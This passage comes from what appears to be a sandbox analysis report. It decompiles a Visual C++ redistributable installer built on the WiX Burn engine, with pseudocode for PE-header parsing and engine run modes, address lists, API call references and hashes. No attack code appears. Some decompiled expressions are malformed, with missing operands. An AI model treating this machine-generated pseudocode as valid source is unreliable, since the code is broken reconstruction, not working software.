											_t271 =  <=  ? _t202 : _t202 & 0x0000ffff | 0x80070000;
											_t252 =  >=  ? 0x80004005 :  <=  ? _t202 : _t202 & 0x0000ffff | 0x80070000;
											E000B37D3(0x80004005, "section.cpp", 0x74, _t252);
											_push("Failed to read signature offset.");
											goto L2;
										}
										_t205 = GetLastError();
										_t274 =  <=  ? _t205 : _t205 & 0x0000ffff | 0x80070000;
										_t252 =  >=  ? 0x80004005 :  <=  ? _t205 : _t205 & 0x0000ffff | 0x80070000;
										E000B37D3(0x80004005, "section.cpp", 0x6f, _t252);
										_push("Failed to seek to section info.");
										goto L2;
									}
								}
								_t208 = GetLastError();
								_t277 =  <=  ? _t208 : _t208 & 0x0000ffff | 0x80070000;
								_t252 =  >=  ? 0x80004005 :  <=  ? _t208 : _t208 & 0x0000ffff | 0x80070000;
								E000B37D3(0x80004005, "section.cpp", 0x5f, _t252);
								_push("Failed to read NT header.");
								goto L2;
							}
							_t211 = GetLastError();
							_t280 =  <=  ? _t211 : _t211 & 0x0000ffff | 0x80070000;
							_t252 =  >=  ? 0x80004005 :  <=  ? _t211 : _t211 & 0x0000ffff | 0x80070000;
							E000B37D3(0x80004005, "section.cpp", 0x59, _t252);
							_push("Failed to seek to NT header.");
							goto L2;
						}
						_t214 = GetLastError();
						_t283 =  <=  ? _t214 : _t214 & 0x0000ffff | 0x80070000;
						_t252 =  >=  ? 0x80004005 :  <=  ? _t214 : _t214 & 0x0000ffff | 0x80070000;
						E000B37D3(0x80004005, "section.cpp", 0x49, _t252);
						_push("Failed to read DOS header.");
						goto L2;
					}
					_t217 = GetLastError();
					_t286 =  <=  ? _t217 : _t217 & 0x0000ffff | 0x80070000;
					_t252 =  >=  ? 0x80004005 :  <=  ? _t217 : _t217 & 0x0000ffff | 0x80070000;
					E000B37D3(0x80004005, "section.cpp", 0x43, _t252);
					_push("Failed to seek to start of file.");
					goto L2;
				} else {
					_t220 = GetLastError();
					_t289 =  <=  ? _t220 : _t220 & 0x0000ffff | 0x80070000;
					_t252 =  >=  ? 0x80004005 :  <=  ? _t220 : _t220 & 0x0000ffff | 0x80070000;
					E000B37D3(0x80004005, "section.cpp", 0x3a, _t252);
					_push("Failed to open handle to engine process path.");
					L2:
					_push(_t252);
					L68:
					E000F012F();
					L69:
					return E000DDE36(_t223, _v8 ^ _t290, _t243, _t247, _t252);
				}
			}




























































                                                                          0x000bb389
                                                                          0x000bb392
                                                                          0x000bb399
                                                                          0x000bb39d
                                                                          0x000bb3a7
                                                                          0x000bb3ae
                                                                          0x000bb3b4
                                                                          0x000bb3bc
                                                                          0x000bb3ce
                                                                          0x000bb3d6
                                                                          0x000bb3de
                                                                          0x000bb3ea
                                                                          0x000bb3f2
                                                                          0x000bb3f3
                                                                          0x000bb3f5
                                                                          0x000bb3f8
                                                                          0x000bb3fd
                                                                          0x000bb435
                                                                          0x000bb43b
                                                                          0x000bb441
                                                                          0x000bb445
                                                                          0x000bb449
                                                                          0x000bb44c
                                                                          0x000bb450
                                                                          0x000bb49a
                                                                          0x000bb49e
                                                                          0x000bb4dc
                                                                          0x000bbad3
                                                                          0x000bbad3
                                                                          0x000bbae0
                                                                          0x000bbae2
                                                                          0x000bbae7
                                                                          0x000bbaec
                                                                          0x000bbaec
                                                                          0x00000000
                                                                          0x000bbaec
                                                                          0x000bb4e2
                                                                          0x000bb4eb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000bb4f4
                                                                          0x000bb4f8
                                                                          0x000bb4fd
                                                                          0x000bb501
                                                                          0x000bb54c
                                                                          0x000bb550
                                                                          0x000bb58e
                                                                          0x000bbab8
                                                                          0x000bbac5
                                                                          0x000bbac7
                                                                          0x000bbacc
                                                                          0x00000000
                                                                          0x000bb5a4
                                                                          0x000bb5a7
                                                                          0x000bb5aa
                                                                          0x000bb5af
                                                                          0x000bb5b7
                                                                          0x000bb5bd
                                                                          0x000bb5c3
                                                                          0x000bb5c7
                                                                          0x000bb616
                                                                          0x000bb665
                                                                          0x000bb6ad
                                                                          0x000bb6b3
                                                                          0x000bb6b7
                                                                          0x000bb6f1
                                                                          0x000bb703
                                                                          0x000bb710
                                                                          0x000bba79
                                                                          0x000bba79
                                                                          0x000bba8a
                                                                          0x000bba94
                                                                          0x000bbaa2
                                                                          0x000bbaa7
                                                                          0x000bbaa8
                                                                          0x000bbaad
                                                                          0x000bbaae
                                                                          0x000bbaae
                                                                          0x00000000
                                                                          0x000bbab3
                                                                          0x000bb718
                                                                          0x000bb719
                                                                          0x000bb726
                                                                          0x000bb732
                                                                          0x000bb73d
                                                                          0x000bb746
                                                                          0x000bba17
                                                                          0x000bba27
                                                                          0x000bba29
                                                                          0x000bba2e
                                                                          0x00000000
                                                                          0x000bba2e
                                                                          0x000bb754
                                                                          0x000bb75e
                                                                          0x000bb768
                                                                          0x000bb772
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000bb778
                                                                          0x00000000
                                                                          0x000bb780
                                                                          0x000bb787
                                                                          0x000bb7bd
                                                                          0x000bb7bf
                                                                          0x000bb7c7
                                                                          0x000bb7ed
                                                                          0x000bb7f8
                                                                          0x000bb800
                                                                          0x000bb84b
                                                                          0x000bb865
                                                                          0x000bb89c
                                                                          0x000bb8a8
                                                                          0x000bb8cf
                                                                          0x000bb91d
                                                                          0x000bb929
                                                                          0x000bb92c
                                                                          0x000bb933
                                                                          0x000bb93d
                                                                          0x000bb945
                                                                          0x000bb954
                                                                          0x000bb947
                                                                          0x000bb94d
                                                                          0x000bb94d
                                                                          0x000bb935
                                                                          0x000bb938
                                                                          0x000bb938
                                                                          0x000bb956
                                                                          0x000bb95f
                                                                          0x000bb968
                                                                          0x000bb971
                                                                          0x000bb97a
                                                                          0x000bb983
                                                                          0x000bb989
                                                                          0x000bb98f
                                                                          0x000bb995
                                                                          0x000bb99b
                                                                          0x000bb9a1
                                                                          0x000bb9af
                                                                          0x000bb9b1
                                                                          0x000bb9b6
                                                                          0x000bb9e1
                                                                          0x000bb9e6
                                                                          0x000bb9ee
                                                                          0x000bb9f7
                                                                          0x000bb9fb
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000bba08
                                                                          0x000bba0d
                                                                          0x000bb835
                                                                          0x000bb835
                                                                          0x00000000
                                                                          0x000bb9b8
                                                                          0x000bb9b8
                                                                          0x000bb9c8
                                                                          0x000bb9ca
                                                                          0x000bb9cf
                                                                          0x000bb9d4
                                                                          0x000bb836
                                                                          0x000bb836
                                                                          0x000bba3f
                                                                          0x000bba41
                                                                          0x000bba43
                                                                          0x000bba4a
                                                                          0x000bba4a
                                                                          0x00000000
                                                                          0x000bba43
                                                                          0x000bb9b6
                                                                          0x000bb91f
                                                                          0x00000000
                                                                          0x000bb91f
                                                                          0x000bb8e1
                                                                          0x000bb8e3
                                                                          0x000bb8f7
                                                                          0x000bb8fc
                                                                          0x00000000
                                                                          0x000bb902
                                                                          0x000bb8aa
                                                                          0x000bb8ba
                                                                          0x000bb8bc
                                                                          0x000bb8c1
                                                                          0x000bba33
                                                                          0x000bba33
                                                                          0x000bba34
                                                                          0x000bba39
                                                                          0x00000000
                                                                          0x000bba39
                                                                          0x000bb867
                                                                          0x000bb878
                                                                          0x000bb882
                                                                          0x000bb890
                                                                          0x000bb895
                                                                          0x00000000
                                                                          0x000bb895
                                                                          0x000bb802
                                                                          0x000bb813
                                                                          0x000bb81d
                                                                          0x000bb82b
                                                                          0x000bb830
                                                                          0x00000000
                                                                          0x000bb830
                                                                          0x000bb7c9
                                                                          0x000bb7d9
                                                                          0x000bb7db
                                                                          0x000bb7e0
                                                                          0x000bb7e5
                                                                          0x00000000
                                                                          0x000bb7e5
                                                                          0x000bb789
                                                                          0x000bb799
                                                                          0x000bb79b
                                                                          0x000bb7a0
                                                                          0x000bb7a6
                                                                          0x000bba76
                                                                          0x000bba76
                                                                          0x00000000
                                                                          0x000bba76
                                                                          0x000bb732
                                                                          0x000bba54
                                                                          0x000bba64
                                                                          0x000bba66
                                                                          0x000bba6b
                                                                          0x000bba71
                                                                          0x00000000
                                                                          0x000bba71
                                                                          0x000bb6b9
                                                                          0x000bb6ca
                                                                          0x000bb6d4
                                                                          0x000bb6e2
                                                                          0x000bb6e7
                                                                          0x00000000
                                                                          0x000bb6e7
                                                                          0x000bb667
                                                                          0x000bb678
                                                                          0x000bb682
                                                                          0x000bb68d
                                                                          0x000bb692
                                                                          0x00000000
                                                                          0x000bb692
                                                                          0x000bb618
                                                                          0x000bb629
                                                                          0x000bb633
                                                                          0x000bb63e
                                                                          0x000bb643
                                                                          0x00000000
                                                                          0x000bb643
                                                                          0x000bb5c9
                                                                          0x000bb5da
                                                                          0x000bb5e4
                                                                          0x000bb5ef
                                                                          0x000bb5f4
                                                                          0x00000000
                                                                          0x000bb5f4
                                                                          0x000bb58e
                                                                          0x000bb552
                                                                          0x000bb563
                                                                          0x000bb56d
                                                                          0x000bb578
                                                                          0x000bb57d
                                                                          0x00000000
                                                                          0x000bb57d
                                                                          0x000bb503
                                                                          0x000bb514
                                                                          0x000bb51e
                                                                          0x000bb529
                                                                          0x000bb52e
                                                                          0x00000000
                                                                          0x000bb52e
                                                                          0x000bb4a0
                                                                          0x000bb4b1
                                                                          0x000bb4bb
                                                                          0x000bb4c6
                                                                          0x000bb4cb
                                                                          0x00000000
                                                                          0x000bb4cb
                                                                          0x000bb452
                                                                          0x000bb463
                                                                          0x000bb46d
                                                                          0x000bb478
                                                                          0x000bb47d
                                                                          0x00000000
                                                                          0x000bb3ff
                                                                          0x000bb3ff
                                                                          0x000bb410
                                                                          0x000bb41a
                                                                          0x000bb425
                                                                          0x000bb42a
                                                                          0x000bb42f
                                                                          0x000bb42f
                                                                          0x000bbaed
                                                                          0x000bbaed
                                                                          0x000bbaf4
                                                                          0x000bbb06
                                                                          0x000bbb06

                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,77D89EB0,00000000), ref: 000BB3FF
                                                                          • SetFilePointerEx.KERNELBASE(000000FF,00000000,00000000,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000BB44C
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,77D89EB0,00000000), ref: 000BB452
                                                                          • ReadFile.KERNELBASE(00000000,000B435C,00000040,?,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000BB49A
                                                                          • GetLastError.KERNEL32(?,?,?,00000000,77D89EB0,00000000), ref: 000BB4A0
                                                                          • SetFilePointerEx.KERNELBASE(00000000,00000000,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000BB4FD
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000BB503
                                                                          • ReadFile.KERNELBASE(00000000,?,00000018,00000040,00000000,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000BB54C
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000BB552
                                                                          • SetFilePointerEx.KERNELBASE(00000000,-00000098,00000000,00000000,00000000,?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000BB5C3
                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,?,00000000,77D89EB0,00000000), ref: 000BB5C9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.374205458.00000000000B1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 000B0000, based on PE: true
                                                                          • Associated: 00000005.00000002.374189553.00000000000B0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374381326.00000000000FB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374448562.000000000011A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                          • Associated: 00000005.00000002.374477296.000000000011E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_b0000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$File$Pointer$Read
                                                                          • String ID: ($.wix$4$@Met$Failed to allocate buffer for section info.$Failed to allocate memory for container sizes.$Failed to find Burn section.$Failed to find valid DOS image header in buffer.$Failed to find valid NT image header in buffer.$Failed to get total size of bundle.$Failed to open handle to user process path.$Failed to read DOS header.$Failed to read NT header.$Failed to read complete image section header, index: %u$Failed to read complete section info.$Failed to read image section header, index: %u$Failed to read section info, data to short: %u$Failed to read section info, unsupported version: %08x$Failed to read section info.$Failed to read signature offset.$Failed to read signature size.$Failed to seek past optional headers.$Failed to seek to NT header.$Failed to seek to section info.$Failed to seek to start of file.$PE$PE Header from file didn't match PE Header in memory.$burn$section.cpp
                                                                          • API String ID: 2600052162-807742151
                                                                          • Opcode ID: 4a58c443ee7a3228d529e3c6007d571e2e17bd474c31bad45ddfbf3f2f74799f
                                                                          • Instruction ID: 1b220c86fdb5ef984e47cc6ad8a2cba6fcd4916da83611b6a84b7ec0eb95054f
                                                                          • Opcode Fuzzy Hash: 4a58c443ee7a3228d529e3c6007d571e2e17bd474c31bad45ddfbf3f2f74799f
                                                                          • Instruction Fuzzy Hash: 2512B6B1A40329ABEB309A25CC45FFB76E9EF04700F114165FE09EB991DBB48D40DBA5
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 000B508D Relevance: 45.8, APIs: 5, Strings: 21, Instructions: 322COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 401 b508d-b513b call df670 * 2 GetModuleHandleW call f03f0 call f05a2 call b1209 412 b513d 401->412 413 b5151-b5162 call b41d2 401->413 414 b5142-b514c call f012f 412->414 419 b516b-b5187 call b5525 CoInitializeEx 413->419 420 b5164-b5169 413->420 421 b53cc-b53d3 414->421 429 b5189-b518e 419->429 430 b5190-b519c call efbad 419->430 420->414 423 b53e0-b53e2 421->423 424 b53d5-b53db call f54ef 421->424 427 b5407-b5425 call bd723 call ca6d0 call ca91e 423->427 428 b53e4-b53eb 423->428 424->423 450 b5453-b5466 call b4e9c 427->450 451 b5427-b542f 427->451 428->427 432 b53ed-b5402 call f041b 428->432 429->414 438 b519e 430->438 439 b51b0-b51bf call f0cd1 430->439 432->427 441 b51a3-b51ab call f012f 438->441 448 b51c8-b51d7 call f29b3 439->448 449 b51c1-b51c6 439->449 441->421 458 b51d9-b51de 448->458 459 b51e0-b51ef call f343b 448->459 449->441 461 b5468 call f3911 450->461 462 b546d-b5474 450->462 451->450 453 b5431-b5434 451->453 453->450 456 b5436-b5451 call c416a call b550f 453->456 456->450 458->441 469 b51f8-b5217 GetVersionExW 459->469 470 b51f1-b51f6 459->470 461->462 465 b547b-b5482 462->465 466 b5476 call f2dd0 462->466 472 b5489-b5490 465->472 473 b5484 call f1317 465->473 466->465 475 b5219-b524c call b37d3 469->475 476 b5251-b5296 call b33d7 call b550f 469->476 470->441 478 b5492 call efcbc 472->478 479 b5497-b5499 472->479 473->472 475->441 501 b52a9-b52b9 call c7337 476->501 502 b5298-b52a3 call f54ef 476->502 478->479 483 b549b CoUninitialize 479->483 484 b54a1-b54a8 479->484 483->484 487 b54aa-b54ac 484->487 488 b54e3-b54ec call f000b 484->488 492 b54ae-b54b0 487->492 493 b54b2-b54b8 487->493 499 b54ee call b44e9 488->499 500 b54f3-b550c call f06f5 call dde36 488->500 497 b54ba-b54d3 call c3c30 call b550f 492->497 493->497 497->488 517 b54d5-b54dc call b550f 497->517 499->500 513 b52bb 501->513 514 b52c5-b52ce 501->514 502->501 513->514 518 b5396-b53ac call b4c33 514->518 519 b52d4-b52d7 514->519 525 b54e1-b54e2 517->525 529 b53b8-b53ca 518->529 530 b53ae 518->530 522 b536e-b5381 call b49df 519->522 523 b52dd-b52e0 519->523 534 b5386-b538a 522->534 526 b52e2-b52e5 523->526 527 b5346-b5362 call b47e9 523->527 525->488 532 b531e-b533a call b4982 526->532 533 b52e7-b52ea 526->533 527->529 541 b5364 527->541 529->421 530->529 532->529 543 b533c 532->543 537 b52fb-b530e call b4b80 533->537 538 b52ec-b52f1 533->538 534->529 539 b538c 534->539 537->529 545 b5314 537->545 538->537 539->518 541->522 543->527 545->532
                                                                          C-Code - Quality: 69%
                                                                          			E000B508D(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed short* _a20) {
				signed int _v8;
				signed short _v16;
				struct _OSVERSIONINFOW _v292;
				signed int _v296;
				intOrPtr _v304;
				signed short _v308;
				intOrPtr _v312;
				WCHAR* _v316;
				WCHAR* _v320;
				WCHAR* _v324;
				WCHAR* _v328;
				signed short* _v332;
				char _v340;
				char _v344;
				signed short _v420;
				intOrPtr _v576;
				intOrPtr _v1316;
				char _v1332;
				signed short _v1340;
				char _v1404;
				intOrPtr _v1532;
				intOrPtr _v1544;
				signed short _v1564;
				char _v1588;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t70;
				void* _t83;
				signed short _t85;
				signed short _t87;
				signed short _t88;
				signed short _t89;
				signed short _t90;
				signed short _t91;
				signed short _t93;
				signed short _t99;
				signed short _t101;
				intOrPtr _t124;
				signed short _t131;
				signed short _t133;
				signed short _t134;
				signed short _t137;
				signed short _t144;
				signed short _t148;
				void* _t149;
				void* _t156;
				signed short _t159;
				signed short _t162;
				signed short _t167;
				signed short _t170;
				signed int _t171;
				void* _t172;
				void* _t173;

				_t156 = __edx;
				_t149 = __ecx;
				_t70 =  *0x11a008; // 0xf77c1860
				_v8 = _t70 ^ _t171;
				_t148 = 0;
				_t157 = _a8;
				_v304 = _a4;
				_v332 = _a20;
				_v312 = _a12;
				_v328 = 0;
				_v324 = 0;
				_v320 = 0;
				_v316 = 0;
				E000DF670(_a8,  &_v292, 0, 0x11c);
				_v296 = 0;
				_v308 = 0;
				E000DF670(_a8,  &_v1588, 0, 0x4e8);
				_t173 = _t172 + 0x18;
				E000F03F0(GetModuleHandleW(0));
				E000F05A2(3, 0);
				_t83 = E000B1209(_t149, _a12,  &_v344,  &_v340); // executed
				if(_t83 >= 0) {
					_t85 = E000B41D2(_t149, _t156, __eflags,  &_v1588, _t157); // executed
					_t162 = _t85;
					__eflags = _t162;
					if(_t162 >= 0) {
						_v1544 = _a16;
						_t87 = E000B5525();
						__imp__CoInitializeEx(0, 0); // executed
						_t162 = _t87;
						__eflags = _t162;
						if(_t162 >= 0) {
							_t159 = 1;
							_t88 = E000EFBAD();
							__eflags = _t88;
							if(_t88 >= 0) {
								_v328 = 1;
								_t89 = E000F0CD1();
								_t164 = _t89;
								__eflags = _t89;
								if(__eflags >= 0) {
									_v324 = 1;
									_t90 = E000F29B3(_t149, _t156, _t164, __eflags); // executed
									__eflags = _t90;
									if(_t90 >= 0) {
										_v320 = 1;
										_t91 = E000F343B(_t90);
										__eflags = _t91;
										if(_t91 >= 0) {
											_v316 = 1;
											_v292.dwOSVersionInfoSize = 0x11c;
											_t93 = GetVersionExW( &_v292);
											__eflags = _t93;
											if(_t93 != 0) {
												E000B33D7( &_v296, 0);
												_push(_v296);
												_push(_v16 & 0x0000ffff);
												_push(_v292.dwBuildNumber);
												_push(_v292.dwMinorVersion);
												_push(_v292.dwMajorVersion);
												E000B550F(2, 0x20000001, "3.10.4.4718");
												_t173 = _t173 + 0x20;
												__eflags = _v296;
												if(__eflags != 0) {
													E000F54EF(_v296);
													_t36 =  &_v296;
													 *_t36 = _v296 & 0;
													__eflags =  *_t36;
												}
												_t99 = E000C7337(_t156, __eflags,  &_v1588); // executed
												_t167 = _t99;
												__eflags = _t167;
												if(_t167 >= 0) {
													_t101 = _v420;
													__eflags = _t101;
													if(_t101 == 0) {
														_t167 = E000B4C33(_t156, _v312,  &_v1588);
														__eflags = _t167;
														if(_t167 >= 0) {
															L38:
															_t150 = _v332;
															_t148 = _v1564;
															 *_v332 = _v1340;
															goto L39;
														}
														_push("Failed to run untrusted mode.");
														goto L9;
													}
													_t131 = _t101 - 1;
													__eflags = _t131;
													if(_t131 == 0) {
														_v308 = _t159;
														_t133 = E000B49DF(_t149, _t156, _v304,  &_v1588); // executed
														_t167 = _t133;
														__eflags = _t167;
														if(_t167 >= 0) {
															goto L38;
														}
														_push("Failed to run per-user mode.");
														goto L9;
													}
													_t134 = _t131 - 1;
													__eflags = _t134;
													if(_t134 == 0) {
														_t167 = E000B47E9(_t149, _t156, _v304, _v312,  &_v1588);
														__eflags = _t167;
														if(_t167 >= 0) {
															goto L38;
														}
														_push("Failed to run per-machine mode.");
														goto L9;
													}
													_t137 = _t134 - 1;
													__eflags = _t137;
													if(_t137 == 0) {
														_v308 = _t159;
														_t167 = E000B4982(_t149, _t156, _v304,  &_v1588);
														__eflags = _t167;
														if(_t167 >= 0) {
															goto L38;
														}
														_push("Failed to run embedded mode.");
														goto L9;
													}
													__eflags = _t137 == 1;
													if(_t137 == 1) {
														_t167 = E000B4B80(_t149,  &_v1332, _a16);
														__eflags = _t167;
														if(_t167 >= 0) {
															goto L38;
														}
														_push("Failed to run RunOnce mode.");
														goto L9;
													}
													_t167 = 0x8000ffff;
													_push("Invalid run mode.");
													goto L9;
												} else {
													_push("Failed to initialize core.");
													L9:
													E000F012F();
													_t150 = _t167;
													goto L39;
												}
											}
											_t144 = GetLastError();
											__eflags = _t144;
											_t170 =  <=  ? _t144 : _t144 & 0x0000ffff | 0x80070000;
											__eflags = _t170;
											_t167 =  >=  ? 0x80004005 : _t170;
											E000B37D3(0x80004005, "engine.cpp", 0x95, _t167);
											_push("Failed to get OS info.");
											goto L9;
										}
										_push("Failed to initialize XML util.");
										goto L9;
									}
									_push("Failed to initialize Wiutil.");
									goto L9;
								}
								_push("Failed to initialize Regutil.");
								goto L9;
							}
							_push("Failed to initialize Cryputil.");
							goto L9;
						}
						_push("Failed to initialize COM.");
						goto L2;
					}
					_push("Failed to initialize engine state.");
					goto L2;
				} else {
					_push("Failed to parse command line.");
					L2:
					E000F012F();
					_t150 = _t162;
					_t159 = _t148;
					L39:
					if(_v296 != 0) {
						E000F54EF(_v296);
					}
					if(_t167 < 0 && _v576 == 0) {
						E000F041B(_t150, _t156, _t159, 0, L"Setup", L"_Failed", L"txt", 0, 0, 0);
					}
					E000BD723( &_v1404); // executed
					E000CA6D0(_t150, _t156, _v1316); // executed
					E000CA91E();
					if(_t148 != 0) {
						_t124 = _v1532;
						if(_t124 != 0 && _t124 != 6) {
							E000B550F(2, 0xa0000008, E000C416A(_t124));
							_t173 = _t173 + 0xc;
							_t167 = 0x80070bc2;
							_t148 = 0;
						}
					}
					E000B4E9C(_t148, _t150, _t159,  &_v1588);
					if(_v316 != 0) {
						E000F3911();
					}
					if(_v320 != 0) {
						E000F2DD0();
					}
					if(_v324 != 0) {
						E000F1317();
					}
					if(_v328 != 0) {
						E000EFCBC();
					}
					if(_t159 != 0) {
						__imp__CoUninitialize(); // executed
					}
					if(_v308 != 0) {
						if(_t167 >= 0) {
							_t159 =  *_v332;
						} else {
							_t159 = _t167;
						}
						_push(E000C3C30(_t148));
						E000B550F(2, 0x20000007, _t159); // executed
						if(_t148 != 0) {
							_push(0xa0000005);
							E000B550F(); // executed
							_t150 = 2;
						}
					}
					E000F000B(_t150, _t159, 0);
					_t193 = _t148;
					if(_t148 != 0) {
						E000B44E9(_t156); // executed
					}
					E000F06F5(_t150, _t159, _t193, 0);
					return E000DDE36(_t148, _v8 ^ _t171, _t156, _t159, _t167);
				}
			}


























































                                                                          0x000b508d
                                                                          0x000b508d
                                                                          0x000b5096
                                                                          0x000b509d
                                                                          0x000b50a8
                                                                          0x000b50ab
                                                                          0x000b50ae
                                                                          0x000b50bc
                                                                          0x000b50ca
                                                                          0x000b50d0
                                                                          0x000b50d6
                                                                          0x000b50dc
                                                                          0x000b50e2
                                                                          0x000b50e8
                                                                          0x000b50f8
                                                                          0x000b5100
                                                                          0x000b5106
                                                                          0x000b510b
                                                                          0x000b5116
                                                                          0x000b511e
                                                                          0x000b5132
                                                                          0x000b513b
                                                                          0x000b5159
                                                                          0x000b515e
                                                                          0x000b5160
                                                                          0x000b5162
                                                                          0x000b516e
                                                                          0x000b5174
                                                                          0x000b517d
                                                                          0x000b5183
                                                                          0x000b5185
                                                                          0x000b5187
                                                                          0x000b5192
                                                                          0x000b5193
                                                                          0x000b519a
                                                                          0x000b519c
                                                                          0x000b51b0
                                                                          0x000b51b6
                                                                          0x000b51bb
                                                                          0x000b51bd
                                                                          0x000b51bf
                                                                          0x000b51c8
                                                                          0x000b51ce
                                                                          0x000b51d5
                                                                          0x000b51d7
                                                                          0x000b51e0
                                                                          0x000b51e6
                                                                          0x000b51ed
                                                                          0x000b51ef
                                                                          0x000b51fe
                                                                          0x000b5205
                                                                          0x000b520f
                                                                          0x000b5215
                                                                          0x000b5217
                                                                          0x000b525a
                                                                          0x000b525f
                                                                          0x000b5269
                                                                          0x000b526a
                                                                          0x000b5270
                                                                          0x000b5276
                                                                          0x000b5288
                                                                          0x000b528d
                                                                          0x000b5290
                                                                          0x000b5296
                                                                          0x000b529e
                                                                          0x000b52a3
                                                                          0x000b52a3
                                                                          0x000b52a3
                                                                          0x000b52a3
                                                                          0x000b52b0
                                                                          0x000b52b5
                                                                          0x000b52b7
                                                                          0x000b52b9
                                                                          0x000b52cb
                                                                          0x000b52cb
                                                                          0x000b52ce
                                                                          0x000b53a8
                                                                          0x000b53aa
                                                                          0x000b53ac
                                                                          0x000b53b8
                                                                          0x000b53b8
                                                                          0x000b53c4
                                                                          0x000b53ca
                                                                          0x00000000
                                                                          0x000b53ca
                                                                          0x000b53ae
                                                                          0x00000000
                                                                          0x000b53ae
                                                                          0x000b52d4
                                                                          0x000b52d4
                                                                          0x000b52d7
                                                                          0x000b5374
                                                                          0x000b5381
                                                                          0x000b5386
                                                                          0x000b5388
                                                                          0x000b538a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b538c
                                                                          0x00000000
                                                                          0x000b538c
                                                                          0x000b52dd
                                                                          0x000b52dd
                                                                          0x000b52e0
                                                                          0x000b535e
                                                                          0x000b5360
                                                                          0x000b5362
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b5364
                                                                          0x00000000
                                                                          0x000b5364
                                                                          0x000b52e2
                                                                          0x000b52e2
                                                                          0x000b52e5
                                                                          0x000b5324
                                                                          0x000b5336
                                                                          0x000b5338
                                                                          0x000b533a
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b533c
                                                                          0x00000000
                                                                          0x000b533c
                                                                          0x000b52e7
                                                                          0x000b52ea
                                                                          0x000b530a
                                                                          0x000b530c
                                                                          0x000b530e
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x000b5314
                                                                          0x00000000
                                                                          0x000b5314
                                                                          0x000b52ec
                                                                          0x000b52f1
                                                                          0x00000000
                                                                          0x000b52bb
                                                                          0x000b52bb
                                                                          0x000b51a3
                                                                          0x000b51a4
                                                                          0x000b51aa
                                                                          0x00000000
                                                                          0x000b51aa
                                                                          0x000b52b9
                                                                          0x000b5219
                                                                          0x000b5228
                                                                          0x000b522a
                                                                          0x000b5232
                                                                          0x000b5234
                                                                          0x000b5242
                                                                          0x000b5247
                                                                          0x00000000
                                                                          0x000b5247
                                                                          0x000b51f1
                                                                          0x00000000
                                                                          0x000b51f1
                                                                          0x000b51d9
                                                                          0x00000000
                                                                          0x000b51d9
                                                                          0x000b51c1
                                                                          0x00000000
                                                                          0x000b51c1
                                                                          0x000b519e
                                                                          0x00000000
                                                                          0x000b519e
                                                                          0x000b5189
                                                                          0x00000000
                                                                          0x000b5189
                                                                          0x000b5164
                                                                          0x00000000
                                                                          0x000b513d
                                                                          0x000b513d
                                                                          0x000b5142
                                                                          0x000b5143
                                                                          0x000b5149
                                                                          0x000b514a
                                                                          0x000b53cc
                                                                          0x000b53d3
                                                                          0x000b53db
                                                                          0x000b53db
                                                                          0x000b53e2
                                                                          0x000b5402
                                                                          0x000b5402
                                                                          0x000b540e
                                                                          0x000b5419
                                                                          0x000b541e
                                                                          0x000b5425
                                                                          0x000b5427
                                                                          0x000b542f
                                                                          0x000b5444
                                                                          0x000b5449
                                                                          0x000b544c
                                                                          0x000b5451
                                                                          0x000b5451
                                                                          0x000b542f
                                                                          0x000b545a
                                                                          0x000b5466
                                                                          0x000b5468
                                                                          0x000b5468
                                                                          0x000b5474
                                                                          0x000b5476
                                                                          0x000b5476
                                                                          0x000b5482
                                                                          0x000b5484
                                                                          0x000b5484
                                                                          0x000b5490
                                                                          0x000b5492
                                                                          0x000b5492
                                                                          0x000b5499
                                                                          0x000b549b
                                                                          0x000b549b
                                                                          0x000b54a8
                                                                          0x000b54ac
                                                                          0x000b54b8
                                                                          0x000b54ae
                                                                          0x000b54ae
                                                                          0x000b54ae
                                                                          0x000b54c0
                                                                          0x000b54c9
                                                                          0x000b54d3
                                                                          0x000b54d5
                                                                          0x000b54dc
                                                                          0x000b54e2
                                                                          0x000b54e2
                                                                          0x000b54d3
                                                                          0x000b54e5
                                                                          0x000b54ea
                                                                          0x000b54ec
                                                                          0x000b54ee
                                                                          0x000b54ee
                                                                          0x000b54f5
                                                                          0x000b550c
                                                                          0x000b550c

                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 000B510F
                                                                            • Part of subcall function 000F03F0: InitializeCriticalSection.KERNEL32(0011B60C,?,000B511B,00000000,?,?,?,?,?,?), ref: 000F0407
                                                                            • Part of subcall function 000B1209: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,000B5137,00000000,?), ref: 000B1247
